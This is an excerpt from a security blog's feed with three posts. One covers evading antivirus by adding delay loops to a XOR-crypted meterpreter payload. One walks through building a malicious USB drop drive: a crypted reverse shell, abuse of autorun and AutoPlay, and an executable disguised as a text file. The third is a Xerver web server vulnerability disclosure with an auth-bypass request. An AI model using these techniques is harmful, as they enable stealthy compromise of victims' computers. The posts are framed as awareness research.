&lt;div class="line"&gt;Short loops:`` pre_loop = &amp;quot;int j, k;n&amp;quot; pre_enc = &amp;quot;for(j=0;j&amp;lt;2;j++){for(k=0;k&amp;lt;2;k++){&amp;quot; enc = &amp;quot;tmp[i]=sc[i]^key;n&amp;quot; post_enc = &amp;quot;}}n&amp;quot; post_loop = &amp;quot;//do nothingn&amp;quot; post_func = &amp;quot;//do nothingn&amp;quot;``&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Long loops: `` pre_loop = &amp;quot;int j, k;n&amp;quot; pre_enc = &amp;quot;for(j=0;j&amp;lt;500;j++){for(k=0;k&amp;lt;100;k++){&amp;quot; enc = &amp;quot;tmp[i]=sc[i]^key;n&amp;quot; post_enc = &amp;quot;}}n&amp;quot; post_loop = &amp;quot;//do nothingn&amp;quot; post_func = &amp;quot;//do nothingn&amp;quot;``&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;As you can see by these detection rates (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=442563fe8a1e23cdafbb701f42c68a87cb5134079971f2580dc3852c3f89a504-1290843756"&gt;short loop detection rate&lt;/a&gt;
/ &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=89ecc6efc6a8837d3a23fcfa812376f8101190ff60018e4da1846c18f2f3edfc-1290842495"&gt;long loop detection rate&lt;/a&gt;), it is clear that Microsoft's AV is
quitting the program execution before the meterpreter payload is fully
decrypted, preventing detection. The short loop is detected, while the
long loop is not. A look at the code in Ollydbg also shows that the only
difference between the two generated executables is the number of loop
iterations.&lt;/p&gt;
&lt;p&gt;As it turns out, this approach is entirely feasible as a method of
avoiding detection: the long loops take less than a second to finish in
my test VM, a negligible delay for the added invisibility. In addition,
Microsoft is not the only AV that can be defeated via this technique. It
appears as though most of the AVs were detecting my payload via similar
techniques, and that most proved similarly weak (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=6fce88ff50fa3bfff259d3471e9c9d59f9191272824543c658f8a065622eb8a9-1290853350"&gt;improved Ubuntu
mingw64 version&lt;/a&gt;). These products include BitDefender, F-Secure, GData,
and nProtect. However, these are certainly not the only ones affected,
and in fact should be commended for detecting my executable in the first
place. Oddly enough, a product called VBA32 began detecting a virus
called &amp;quot;BScope.Jackz.e&amp;quot; after I added these loops, which makes me
curious as to whether or not someone is already exploiting this
weakness.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="convincing-conclusion"&gt;
&lt;h2&gt;Convincing Conclusion&lt;/h2&gt;
&lt;p&gt;To begin my carefully crafted conclusion to this alliterative analysis
of antivirus, I want to first note that this post is certainly not meant
to disrespect the work that AV companies do: detection of malware is
difficult business, and the attacker certainly has a significant
advantage. My malware is certainly not anywhere near the hardest threat
that AV has to deal with, either. Indeed, this probably partly explains
why it was so easy to bypass detections: the adults had better things to
do than write definitions specifically for my crappy toy crypter. I
seriously doubt that the writers of Conficker could resort to such
simple methods to avoid detection. That said, it seems to me that trying
to implement detection based on live behavioral techniques could
significantly improve AV effectiveness, much more than toiling
hopelessly away in research labs, trying to complete the Sisyphean task
of writing definitions that catch every known or slightly modified piece
of malware. At some point, if not already, this will become entirely
impossible, and a new solution will need to be devised.&lt;/p&gt;
&lt;p&gt;Of course, in this discussion, we must also remember that AV is
essentially the very last line of defense between an attacker and code
execution, and if one manages to get to this point, our system
protections have already failed miserably. To me, AV is analogous to the
TSA: expensive, intrusive, and not incredibly effective for the effort
involved. This is not to say that AV is not helpful in preventing
attacks; both AV and the TSA are decent barriers that make it more
difficult to exploit common attack vectors. However, neither are the
be-all-end-all of security in their respective fields, and, with
effective security policies in place, they should only be present as a
contingency plan of sorts, to become important in preventing attacks
only if all else fails. I hope this small test case has illustrated the
degree to which a system's overall security posture (disabling
AutoRun/AutoPlay, disallowing USB drives, keeping software up-to-date,
etc) is much more important than simply having up to date antivirus
software installed on a given system, and that we need to continue to
research new ways to improve AV detection methods so that it might not
need to rely solely on reactive virus definitions, but rather work
towards a system aided by proactive detection techniques.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="antivirus"></category><category term="antivirus evasion"></category><category term="usb"></category></entry><entry><title>The USB Stick O' Death</title><link href="https://spareclockcycles.org/2010/11/21/the-usb-stick-o-death.html" rel="alternate"></link><updated>2010-11-21T21:07:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-11-21:2010/11/21/the-usb-stick-o-death.html</id><summary type="html">&lt;p&gt;Alright, so maybe this title is a bit hyperbolic and misleading, but I
think that this post deserves an exciting name. And yes, it's been a
long time since I posted, but screw it, I'll post when I get around to
it.&lt;/p&gt;
&lt;p&gt;I've recently been researching and experimenting with USB malware, and I
wanted to take a shot at developing my own malicious USB stick. Now, I'm
aware that &lt;a class="reference external" href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)"&gt;SET&lt;/a&gt; provides a simple way to quickly backdoor an USB
drive, but their implementation is a little lacking in a lot of areas
(not to detract from the application, it is a great tool). The
executable it creates is a simple meterpreter backdoor, which, though
not perfectly detected by any means, still has a higher detection rate
than I would like. In addition, it only exploits a single attack vector,
abusing AutoPlay. My goals were a 0% detection rate of the payload by
antivirus, 32 and 64 bit support, and for the drive to utilize as many
technical and social engineering vectors as possible, so it was clear I
was going to have to do some work myself. By all accounts, I believe I
have largely achieved these goals, and created a very effective, and
largely undetected, malicious USB drive. A side note: if you are
interested in USB malware, the &lt;a class="reference external" href="http://www.offensive-security.com/metasploit-unleashed/SET_Teensy_USB_HID_Attack"&gt;Teensy HID vector&lt;/a&gt;, as far as I can
tell, is really the next generation of USB attacks. Sadly, however, I do
not have one of these devices yet to play around with, so I decided to
focus on getting the most out of the lowly USB drives I had laying
around.&lt;/p&gt;
&lt;p&gt;I do want to start by saying that this post is not meant to be a &amp;quot;how
to&amp;quot; guide on how to create a malicious USB drive, but rather, a
documentation of the thought process an attacker might go through to
create their own, as well as an illustration of just how large of a
security risk the lowly USB drive still poses. There are literally
thousands of different design choices that could be made at every point
during this process, from social engineering strategies, to what
payloads to include, to how to evade antivirus. The methods I ended up
choosing are, admittedly, crude and unrefined, but they achieved my
intended goals, and gave me, surprisingly quickly, an effective and
largely undetected malicious USB drive. Readers interested in creating
their own drives should keep this in mind while reading, and are
definitely encouraged to take their own approach to solving the problem.
As always, let me know if you find something interesting or if you try
something different, I'd be very interested in hearing what you did.&lt;/p&gt;
&lt;div class="section" id="software-and-supplies"&gt;
&lt;h2&gt;Software and Supplies&lt;/h2&gt;
&lt;p&gt;First, of course, you will need to get the necessary software and
supplies. I did all of this with an Ubuntu installation and a Windows
VM, so it will be documented as such. If you have a different setup, you
will need to alter the process accordingly. In addition to these, I had
a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/U3"&gt;U3 enabled USB drive&lt;/a&gt;, a recent copy of the &lt;a class="reference external" href="http://www.metasploit.com/"&gt;Metasploit framework&lt;/a&gt;,
a copy of the &lt;a class="reference external" href="http://www.hak5.org/packages/files/Universal_Customizer.zip"&gt;U3 Customizer&lt;/a&gt;, a working installation of the &lt;a class="reference external" href="http://sourceforge.net/projects/mingw-w64/"&gt;mingw64
compiler&lt;/a&gt;, a really obscure application called &lt;a class="reference external" href="http://www.abyssmedia.com/quickbfc/"&gt;Quick Batch File
Compiler&lt;/a&gt;, and &lt;a class="reference external" href="http://www.ollydbg.de/"&gt;Ollydbg&lt;/a&gt; (or your debugger of choice). A side note:
for mingw64 on Ubuntu, I actually ended up using &lt;a class="reference external" href="https://launchpad.net/~tobydox/+archive/mingw"&gt;this excellent PPA&lt;/a&gt;
to get things working; there seems to be a packaging bug in the
repositories right now that prevents cross-compilation of 64 bit
executables. You probably won't end up needing this, but it's nice to
have in case you do. Finally, you can grab &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/usod_v0.01.tar.gz"&gt;a tarball of some of the
code I wrote and my autorun configurations&lt;/a&gt;, if you want to follow
along.&lt;/p&gt;
&lt;p&gt;Once you have these things, you should be all set to get started.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="writing-a-simple-xor-crypter"&gt;
&lt;h2&gt;Writing a Simple XOR Crypter&lt;/h2&gt;
&lt;p&gt;The first problem I had to solve was how to decrease the detection rate
of my payload. As my first payload, I decided on a standard reverse_tcp
meterpreter shell. From this, I could do whatever post exploitation I
wanted, including remotely managing the victim's computer safely from a
remote location. Many tools, such as the &lt;a class="reference external" href="http://www.hak5.org/w/index.php/USB_Switchblade"&gt;U3 switchblade&lt;/a&gt;, run a bunch
of tools that collect information on the local machine (passwords, IP,
patches, etc) and store the back to the USB drive. However, as I was
intending to use this drive in a USB drop style attack, it didn't make
much sense to try to gather and save a bunch of information that I might
not be able to recover later. As long as I have a shell connecting back
to me, I can make any of these attacks run automatically with the
AutoRunScript setting anyway.&lt;/p&gt;
&lt;p&gt;However, even just with the reverse_tcp shell running, antivirus tends
to start throwing up red flags. The meterpreter shell alone, even when
embedded in another executable using Metasploit's handy template option,
has &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=57a61f688a7be2bb958d6e1b49ec03658b644d40f875723f674b4d51e7b2e963-1290383155"&gt;a little less than 40% detection rate&lt;/a&gt;, clearly unacceptable for
my purposes. It was pretty obvious that I was going to have to write
something to obfuscate my payload.&lt;/p&gt;
&lt;p&gt;What surprised me during all of this was how ridiculously easy it is to
do just that. About 60 lines of Python (I know, way too many) and 20
lines of C was all it took to take my detection rate from 40% to 1% (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=969a1589ff1522dd661fe9bee8ba81e4272c54100dc0883aba2378edf75c6a26-1290383512"&gt;32
bit version&lt;/a&gt; / &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=6bcc45931477218064e8e0e1da1d2c43e4bcbc9cf386c28dc08958ecb7ae0507-1290383590"&gt;64 bit version&lt;/a&gt;). The Python code largely is just to
automate things, but it also made the XOR crypting easier and allowed me
to more easily embed arbitrary executables in my code (which is useful
in embedding other, non-metasploit payloads). It should also help me
extend and modify my code when backdoor starts becoming detected (I
don't give it long, it's basically the simplest obfuscation ever). In
the tarball you grabbed earlier, I included one of the earlier versions
of my code (wouldn't want to spoil all the development fun for you all,
would I? :P). That version will use Metasploit to generate a payload,
create a simple C file that wraps it in a simple &lt;a class="reference external" href="http://en.wikipedia.org/wiki/XOR_cipher"&gt;XOR crypter&lt;/a&gt;, and
then compiles it into 32 bit (and 64 bit, if desired) binaries using
mingw64. This alone should be more than you need to get started making
your own payloads.&lt;/p&gt;
&lt;p&gt;I'm still struggling with how low the detection rates got with such a
simple technique, as it was essentially the most basic XOR crypter one
could write. Even factoring in that it was being cross-compiled with
mingw64 rather than natively compiled in Visual Studio or the like
(which can throw off some signatures), it still shouldn't have ruined
detection rates that badly. I guess I just expect more from antivirus
companies than they actually deliver. As you can see, only a single
detection is still occurring in my tests: Microsoft's definitions catch
my 32-bit payload. However, I suppose 1/86 isn't bad, and I'll be
looking into getting that to 0. Any suggestions are welcome.&lt;/p&gt;
&lt;p&gt;EDIT: I did a follow-up to this post on &lt;a class="reference external" href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection/"&gt;avoiding AV detection&lt;/a&gt;, in
which I solved this detection issue by simply wasting some processor
time prior to decrypting the payload. Who knew bypassing AV would be as
easy as adding a lowly for loop? :P&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bit-support"&gt;
&lt;h2&gt;64 Bit Support&lt;/h2&gt;
&lt;p&gt;The next problem to tackle was how to get the payload to work on both 32
and 64 bit systems. And actually, as it turns out, this isn't a problem
at all. Although I researched how to generate 64 bit executables, and
they hide remarkably well, the 32 bit payload works just fine in 64 bit
Windows. I was a bit worried that Metasploit wouldn't be able to migrate
to 64 bit processes, but it seems that they added that feature awhile
back. So hooray! On to the next step.&lt;/p&gt;
&lt;p&gt;In case you do, for some reason however, want a separate 64-bit payload,
the quick and easy solution is to simply write a batch file that checks
the %PROCESSOR_ARCHITECTURE% environment variable and runs the
corresponding payload. There are plenty of other ways to do it too, but
this method is pretty straightforward.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="packing-into-a-single-executable"&gt;
&lt;h2&gt;Packing Into a Single Executable&lt;/h2&gt;
&lt;p&gt;For a social engineering attack I will describe later, I wanted to be
able to pack a text file, a payload, and a tiny batch file that runs
both into a single executable. This is where Quick Batch File Compiler
came in. Although a rather obscure, and slightly shady, application, it
was able to do four things that are very useful: embed a batch file in
an executable (obviously), customize the generated executable with
description text and icon, compress and pack any other necessary files
inside the executable, and (also very importantly) run the executable in
what it calls &amp;quot;ghost mode&amp;quot; (which basically means that no windows are
created). You could pretty easily do all of these things on your own
using &lt;a class="reference external" href="http://download.cnet.com/Resource-Hacker/3000-2352_4-10178587.html"&gt;Resource Hacker&lt;/a&gt;, &lt;a class="reference external" href="http://www.petri.co.il/create_executable_with_iexpress.htm"&gt;iexpress&lt;/a&gt;, and/or a little bit of C, but why
do work someone has already done for you? There is one drawback to using
QBFC: any application compiled in Ghost Mode (with the free version)
displays a nag screen every time you run it. I will leave it as an
exercise for the reader to figure out how to use Olly (or your favorite
debugger) to bypass said issue. Hint: you only need to change a single
byte.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="weaponizing-the-drive"&gt;
&lt;h2&gt;Weaponizing the Drive&lt;/h2&gt;
&lt;p&gt;Once I had a sufficiently invisible and properly packaged payload that
would run anywhere, I was ready to weaponize the drive. Now, there are
two classic approaches to doing this: either through the use of a U3
drive to exploit AutoRun, or through various social engineering avenues
that AutoPlay and Windows provide us. For mine, I decided to take
advantage of both.&lt;/p&gt;
&lt;div class="section" id="abusing-u3"&gt;
&lt;h3&gt;Abusing U3&lt;/h3&gt;
&lt;p&gt;The U3 vector is pretty straightforward to exploit, and you can see how
I went about exploiting it if you look at the autorun.inf in the U3
directory in my source package. All you really need to do is make sure
that the open command in the autorun.inf file points to your desired
payload, and you are good to go. There are a couple other very useful
things that you can do (as you can see in the file), but I will discuss
these in the next section. Once you've made your autorun.inf, take it,
your icon file, and your malicious executable (I have not supplied one,
for obvious reasons), and throw it into the U3CUSTOM folder in the
extracted UniversalCustomizer folder. Then simply run the ISOCreate
batch file, insert your U3 drive, run the Universal_Customizer.exe
file, and walk through the steps. Once your done, you should have a
brand new, hard to detect, malicious U3 payload that runs silently in
the background on XP.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="abusing-autoplay"&gt;
&lt;h3&gt;Abusing AutoPlay&lt;/h3&gt;
&lt;p&gt;Now that I had a payload that would run on many computers that aren't
locked down sufficiently, I also needed some backup plans, in the
probable case that I encountered machines with a competent system
administrator. This is where AutoPlay abuse and executable resource
hacking come into play. The main problem this tries to address is how
can we trick a user into running our backdoor for us, even if they are
protected by stronger than ordinary security policies.&lt;/p&gt;
&lt;p&gt;As I alluded to earlier, there are a couple of fun, useful tricks that
one can do to use AutoPlay to their advantage. The classic one (and one
that has been exploited quite effectively by the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Conficker"&gt;Conficker worm&lt;/a&gt;) is
to set a default action for the drive that looks exactly like Windows'
normal &amp;quot;Open folder to view files&amp;quot; command. When AutoPlay then pops up,
the user (on Windows XP) is presented with a default option to &amp;quot;Open
folder to view files&amp;quot; that looks almost exactly like the original one,
but that now runs our malicious payload.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay1.png"&gt;&lt;img alt="autoplay example 1" src="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay1-280x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We also exploit this same social engineering attack on the Windows 7 U3
autorun. Windows 7 has significantly locked down USB security, but CD
security (which is what matters in the U3 attack) is still somewhat
lacking. Although the payload no longer runs silently, the user is
presented with a prompt asking them if they want to view the files with
our malicious payload.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/win72.png"&gt;&lt;img alt="image1" src="https://spareclockcycles.org/wp-content/uploads/2010/11/win72-300x263.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Beyond this attack, we can also set what are known as shell commands,
more commonly known as the right click options for the drive. Windows,
in its infinite wisdom, decided it was a good idea to allow devices to
override the default shell commands if they so desired. By overriding
the &amp;quot;Open&amp;quot;, &amp;quot;Explore&amp;quot;, and &amp;quot;Search...&amp;quot; commands, we can not only all but
ensure that any user trying to evade AutoPlay by opening the drive
through a right click command will still be compromised, but in a
convenient twist, we also override the default double-click command.
This means that basically any interaction directly through the drive
icon will result in code execution. In fact, the only way I have found
to get into the drive if the autorun.inf file has been processed is to
browse in manually through the Folders sidebar or by selecting the
proper (non-default) &amp;quot;Open folder to view files&amp;quot; command at the AutoPlay
prompt. It is unlikely that a user will do things this way, so we can be
fairly confident that if AutoPlay isn't disabled (on XP at least) and
the user tries to view the files, we will get code execution.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay2.png"&gt;&lt;img alt="image2" src="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay2.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-social-engineering-component"&gt;
&lt;h3&gt;The Social Engineering Component&lt;/h3&gt;
&lt;p&gt;However, XP is not the only Windows operating system, and AutoPlay very
well might be disabled by a good system admin (or, as I found out, by
certain antivirus products -&amp;gt; AntiVir). If this is the case, then we
need to rely on good ol' social engineering to get the user to click our
file. Now, there are a ridiculous number of ways to do this, from
labeling something &amp;quot;FREE_TACOS.JPG.EXE&amp;quot; or
&amp;quot;BRItANy_SPares_NAk3d!!1one.avi.exe&amp;quot; to just putting a bunch of inane
files that are all backdoored and hope the user gets curious. For my
approach, I decided to again work off the assumption that the attack
drive would be used in a USB drop, where a drive is &amp;quot;lost&amp;quot; in a heavily
trafficked area, with the hope that someone will find it and plug it
straight into their computer.&lt;/p&gt;
&lt;p&gt;With this particular attack as my starting point, I decided that one of
the most likely things someone would click on, then, would be the
contact information of who owns the drive. Hence, my solution: make an
executable that looks as much like a text document as possible named
&amp;quot;contact_info&amp;quot;, that opens a text document with contact information in
it, but also runs my malicious code in the background, unknown to the
helpful user. Not only do I then get code execution, but the kindly user
can then return the drive to me (if I decide I want to risk putting my
actual contact info on the drive, which is certainly not a given). With
QBFC, it was trivial not only to add in the default text file icon as
the executable's icon, but also edit the company and version information
to say &amp;quot;Text Document&amp;quot; and &amp;quot;1 KB&amp;quot; respectively, which Windows then
kindly displays in the same manner as a normal text document's size and
filetype information. In addition, I only needed to add a single start
command and embed a text file to make the application appear to simply
open Notepad.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/socialengineer.png"&gt;&lt;img alt="Text File Example" src="https://spareclockcycles.org/wp-content/uploads/2010/11/socialengineer-300x224.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This technique does not work as effectively on Windows 7, as they
changed the file information displayed by default (now it correctly says
that it is an executable), but it remains an enticing
file,&amp;nbsp;especially&amp;nbsp;with the text file icon still in place.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/win7.png"&gt;&lt;img alt="image4" src="https://spareclockcycles.org/wp-content/uploads/2010/11/win7-300x225.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusions"&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;
&lt;p&gt;And there you have it: how I developed my USB Stick O' Death, from start
to finish. It's not the be-all end-all of malicious USB drives, as the
name might imply, but it does provide a down-and-dirty example of how to
achieve silent and reliable code execution using USB exploitation
quickly and easily. Because I have now published these techniques, it is
likely that detection rates for my specific method will go up
significantly. However, I hope that I have illustrated just how easy it
is to bypass current antivirus detection mechanisms with a little
thought and a few lines of C, so that it is trivial for you, the reader,
to make them undetectable once again. For myself, writing up this post
took significantly longer than actually doing the work, if that gives
you any idea of how long it took me to do all of this.&lt;/p&gt;
&lt;p&gt;In addition, I hope this has raised awareness on just how trivial it is
to use U3, AutoPlay, and social engineering to get users to run
malicious code. I know that I certainly learned a few things
(specifically, not to use the Explore shell command to open drives). It
is clear to me that the only real way to prevent these kinds of attacks,
barring some big changes from Microsoft, is to disable or greatly limit
USB drives on most networks, and to educate people (possibly through the
demonstration of this drive) just how easy it is to go from plugging in
a USB drive to an attacker having full access to their computer. Even
with proactive steps to counteract these attacks, it is likely, given
the current state of USB security, that these attacks will continue to
be effective well into the foreseeable future.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="autoplay"></category><category term="autorun"></category><category term="death"></category><category term="linux"></category><category term="metasploit"></category><category term="meterpreter"></category><category term="social engineering"></category><category term="usb"></category><category term="windows"></category></entry><entry><title>RevDNS 0.30 Release</title><link href="https://spareclockcycles.org/2010/08/22/revdns-0-30-release.html" rel="alternate"></link><updated>2010-08-22T17:38:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-08-22:2010/08/22/revdns-0-30-release.html</id><summary type="html">&lt;p&gt;Hey all,&lt;/p&gt;
&lt;p&gt;Today I posted &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns/revdns_cur.tar.gz"&gt;RevDNS v0.30&lt;/a&gt;, an update to the multi-threaded Python
script based on dnspython that I wrote for quickly doing reverse DNS
scans of IP blocks. Version 0.30 adds some new features, and fixes a few
bugs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;New Features&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Improved threading system, based on the use of a lockable iterator.
(translation: faster lookups)&lt;/li&gt;
&lt;li&gt;Specify target DNS server(s).&lt;/li&gt;
&lt;li&gt;Specify arbitrary DNS settings via custom resolv.conf file (*nix
only)&lt;/li&gt;
&lt;li&gt;Set number of retries on timeout error. Setting this greatly reduces
the number of missed hosts.&lt;/li&gt;
&lt;li&gt;Select TCP or UDP as the DNS transport protocol.&lt;/li&gt;
&lt;li&gt;Now handles rare but valid instances where IP address has multiple
PTR records.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Bug Fixes&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Fixed issue with Python xrange function, which would crash the
program in certain circumstances.&lt;/li&gt;
&lt;li&gt;Related to the above, added support for OSX. Thanks to Justin
Morehouse for the bug report.&lt;/li&gt;
&lt;li&gt;Fixed problem with regex not matching certain addresses during IP
verification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As always, feel free to submit bug reports and feature requests if you
have any issues whatsoever. Patches are also greatly appreciated.&lt;/p&gt;
&lt;p&gt;UPDATE 08/22/2010: All, it appears I linked to some testing code rather
than the final revision. The link has been fixed, sorry about the
mix-up.&lt;/p&gt;
</summary></entry><entry><title>Multiple Vulnerabilities in Xerver 4.32</title><link href="https://spareclockcycles.org/2010/08/01/multiple-vulnerabilities-in-xerver-4-32.html" rel="alternate"></link><updated>2010-08-01T01:05:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-08-01:2010/08/01/multiple-vulnerabilities-in-xerver-4-32.html</id><summary type="html">&lt;p&gt;Sorry for the downtime everyone! I've been quite busy this summer, but
I'm back now, and I've got vulnerabilities for everybody! Well,
everybody who's looking for vulnerabilities in Xerver web server at
least.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.javascript.nu/xerver/"&gt;Xerver&lt;/a&gt; is a web server written in Java and appears to be targeted at
Windows users (although it is cross platform). Xerver is apparently the
&lt;a class="reference external" href="http://www.google.com/search?q=free+web+server"&gt;first result&lt;/a&gt; for &amp;quot;free web server&amp;quot; on Google, even edging out Apache.
How it got up there, I will never know, but it makes me doubt Google's
search gnomes' abilities. With &lt;a class="reference external" href="http://download.cnet.com/Xerver-Free-Web-Server/3000-10248_4-10074595.html"&gt;~125,000 downloads on Cnet&lt;/a&gt; though, I
guess it isn't completely obscure.&lt;/p&gt;
&lt;p&gt;I spent a couple of my slower evenings looking over the code, and I came
across a number of serious vulnerabilities in Xerver. These
vulnerabilities include insecure default settings, denial of service,
http authentication bypass, source disclosure, very minor directory
transversal, and limited (for now) remote code execution. These are in
addition to a number of unpatched vulnerabilities already discovered by
other researchers, the most serious being an &lt;a class="reference external" href="http://www.securityfocus.com/bid/36454"&gt;authentication bypass on
the configuration pages&lt;/a&gt; (remote configuration disabled by default), a
different &lt;a class="reference external" href="http://www.exploit-db.com/exploits/9649/"&gt;source disclosure vulnerability&lt;/a&gt;, and an &lt;a class="reference external" href="http://www.juniper.net/security/auto/vulnerabilities/vuln37064.html"&gt;HTTP response
splitting attack&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This post will document the issues I found, as well as some fixes. For
the impatient, you can just skip my explanations and grab my &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/xerver_source_disclosure.rb"&gt;PoC
Metasploit module&lt;/a&gt; for the authentication bypass and the source
disclosure. Note that I have not yet released the remote code execution
PoC, for reasons explained at the end of this post.&lt;/p&gt;
&lt;div class="section" id="responsible-disclosure"&gt;
&lt;h2&gt;Responsible Disclosure&lt;/h2&gt;
&lt;p&gt;I contacted Xerver's lead developer, Omid Rouhani, as soon as I found
these issues, and received an email back from him requesting a patch. I
provided a patch that fixes the issues that I found that are not
design-related, but he has yet to publish the fixes (it's been over 2
weeks now). I feel that it is best that users know the vulnerabilities
exist (as they are made much worse by insecure configurations) so that
they can take appropriate actions. Concerned users can grab my patched
source &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/XerverSource.zip"&gt;here&lt;/a&gt;. The patched version addresses the HTTP authentication
bypass, source disclosure, and HTTP response splitting vulnerabilities.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="insecure-default-settings"&gt;
&lt;h2&gt;Insecure Default Settings&lt;/h2&gt;
&lt;p&gt;A large majority of users will, without fail, simply use the default
application settings, so it is common practice to try and make these
settings as secure as possible, and warn users if they try to make them
less so. Xerver, however, seems to have gone out of its way to have the
most insecure default settings possible. That is the only explanation
for some of the atrocious configuration choices I found. These issues
were present in both the initial, clean install settings and in the
default settings chosen by the provided setup wizard.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Directory listings are enabled by default. This is not *generally*
a huge problem as long as everything else is securely set up.&lt;/li&gt;
&lt;li&gt;The default root directory is C:\ . This means that unauthenticated
users have access to everything on the drive that the user who
started the Xerver process does (most likely an administrator),
meaning configuration files, private user data, and pretty much
anything else you'd want become world accessible. And to make things
worse, combined with directory listings, it's as easy as navigating
the file system to the file you want.&lt;/li&gt;
&lt;li&gt;The configuration page has no password protection. It is not remotely
available by default, but when configured this way it represents a
significant vulnerability (that would allow an attacker to get code
execution).&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="denial-of-service"&gt;
&lt;h2&gt;Denial of Service&lt;/h2&gt;
&lt;p&gt;You know that when one of the first comments in the code that you read
says &amp;quot;If someone creates 150 connections to this server, no one else
will be able to connect to us anymore,&amp;quot; that DoS is going to be a bad
problem. I documented three that I found right away, but there are
definitely more.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Open 150 connections very quickly. Easy enough.&lt;/li&gt;
&lt;li&gt;Inject a null byte into the appropriate place to convince the server
to access a file that &amp;quot;exists&amp;quot; but doesn't actually exist. Causes the
thread to hang indefinitely, making the DoS easier.&lt;/li&gt;
&lt;li&gt;Run an application that doesn't quit without user input, which hangs
the thread as well for 5 minutes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="authentication-bypass"&gt;
&lt;h2&gt;Authentication Bypass&lt;/h2&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Xerver does provide the ability to password protect directories with basic HTTP Auth; however, this protection was very easily circumvented in most circumstances. To do this, one must simply use two slashes (orbackslashes) on the front of the GET request string instead of the normal one forward slash, and as long as the password protected directory is not a.) the root directory AND b.) recursively protected, the read will succeed. Code:&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;`` GET //protected_folder/protected_file.txt HTTP/1.1``&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The reason this works is a bug in the code at
NewConnection-&amp;gt;accessToFolderIsOK. Xerver compares the folder being
requested to it's internal list of protected folders by looping through
each, and comparing the two strings. If they're equal, then the folder
requires password protection, and the auth routine is entered. However,
it was possible to bypass the auth routine entirely with a string that
did not match the stored folder byte-for-byte (two slashes rather than
one), but still allowed Java (through the Windows API) to find and read
the file. To solve this issue, Xerver should be normalizing it's
inputted paths to a single standard separator character, rather than
letting anything and everything through. This is fixed in my patch.&lt;/p&gt;
&lt;p&gt;In addition to this vulnerability, the method of checking usernames and
passwords that Xerver uses is insecure. Rather than looking up the
username in the username/password file and then checking to see if the
provided password matches the given password, Xerver loops through all
the known passwords and, if it finds a match, allows us to log in with
that username. This means that a.) we don't need to know a username and
b.) we only have to guess the weakest password. Not good.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="null-byte-injection"&gt;
&lt;h2&gt;Null Byte Injection&lt;/h2&gt;
&lt;p&gt;The following two and a half vulnerabilities are due to a null byte
injection vulnerability. My patch should fix these as well.&lt;/p&gt;
&lt;div class="section" id="full-source-disclosure"&gt;
&lt;h3&gt;Full Source Disclosure&lt;/h3&gt;
&lt;p&gt;A classic source disclosure vulnerability, this one relies on a null
